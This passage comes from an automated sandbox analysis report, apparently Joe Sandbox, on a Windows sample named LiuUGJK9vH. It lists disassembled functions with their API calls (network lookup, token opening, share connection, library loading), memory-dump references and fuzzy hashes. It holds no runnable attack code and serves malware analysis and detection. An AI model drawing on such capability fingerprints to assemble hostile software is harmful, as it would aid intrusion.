                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                      • String ID:
                      • API String ID: 1378193009-0
                      • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                      • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                      • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                      • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                      Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                      • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                      • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                      • _memmove.LIBCMT ref: 004763D1
                      • inet_ntoa.WSOCK32(?), ref: 004763DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                      • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                      • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                      • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                      Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                      • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                      • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                      • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                      Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                      • GetClientRect.USER32(?,?), ref: 0043B5FB
                      • GetCursorPos.USER32(?), ref: 0043B605
                      • ScreenToClient.USER32(?,?), ref: 0043B610
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Client$CursorLongProcRectScreenWindow
                      • String ID:
                      • API String ID: 4127811313-0
                      • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                      • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                      • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                      • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                      Function 02F9218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02F915D8,00000000,00000000,?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue), ref: 02F921BD
                      • GetLastError.KERNEL32(?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue,02FA6FC4,FlsSetValue,00000000,00000364,?,02F9192D), ref: 02F921C9
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02F92132,02F915D8,00000000,00000000,00000000,?,02F92283,00000006,FlsSetValue,02FA6FC4,FlsSetValue,00000000), ref: 02F921D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 2a4c21d86cdea79aa5581da8294a0114f2ac1c248165c1ed26b9aaeeabeafe22
                      • Instruction ID: 8c26aec8503f97a3adc6f93f7c1f38cc88298d0d4b2f13249cbac84912bfb667
                      • Opcode Fuzzy Hash: 2a4c21d86cdea79aa5581da8294a0114f2ac1c248165c1ed26b9aaeeabeafe22
                      • Instruction Fuzzy Hash: 4B018872F812267BFF224A69DC44A567B98AB45BE17110920EF15D7140D720D561CEF0
                      Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                      Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 0048B2E4
                      • ScreenToClient.USER32(?,?), ref: 0048B2FC
                      • ScreenToClient.USER32(?,?), ref: 0048B320
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                      • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                      • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                      • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                      Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                        • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                      • _memmove.LIBCMT ref: 00466C09
                      • _memset.LIBCMT ref: 00466C16
                      • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                      • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                      • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                      • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                      Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00402231
                      • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                      • SetBkMode.GDI32(?,00000001), ref: 00402250
                      • GetStockObject.GDI32(00000005), ref: 00402258
                      • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                      • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                      • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                      • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                      • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                      • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                      • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                      • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                      Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 0045871B
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                      • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                      • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                      • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                      Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: %I
                      • API String ID: 0-63094095
                      • Opcode ID: f2f4929fe2eedd23798a4379a72baaa43463731a43e0617181cc308ff8d27f8c
                      • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                      • Opcode Fuzzy Hash: f2f4929fe2eedd23798a4379a72baaa43463731a43e0617181cc308ff8d27f8c
                      • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                      Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __itow_s
                      • String ID: xbL$xbL
                      • API String ID: 3653519197-3351732020
                      • Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                      • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                      • Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                      • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                      Function 02F8FAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: pow
                      • API String ID: 0-2276729525
                      • Opcode ID: c365b4ea0b4c1bf2f43f9a0daadf3d6d17f838ea2aa92b8c8e44ba4b5b5179f8
                      • Instruction ID: 81a02b8ae14e1ef72100cc1ebef06d201f70b58aadf8283f0a7b75502205012b
                      • Opcode Fuzzy Hash: c365b4ea0b4c1bf2f43f9a0daadf3d6d17f838ea2aa92b8c8e44ba4b5b5179f8
                      • Instruction Fuzzy Hash: F6517F72F082079AEF157714C94037BFBA4DB40BD4F508E78DB9A426A8EB3685D5CE42
                      Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • __wcsnicmp.LIBCMT ref: 0046B02D
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                      • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                      • Opcode Fuzzy Hash: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                      • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                      Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00412968
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                      • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                      • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                      • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                      Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID: DdL$DdL
                      • API String ID: 1473721057-91670653
                      • Opcode ID: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                      • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                      • Opcode Fuzzy Hash: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                      • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                      Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 0047259E
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
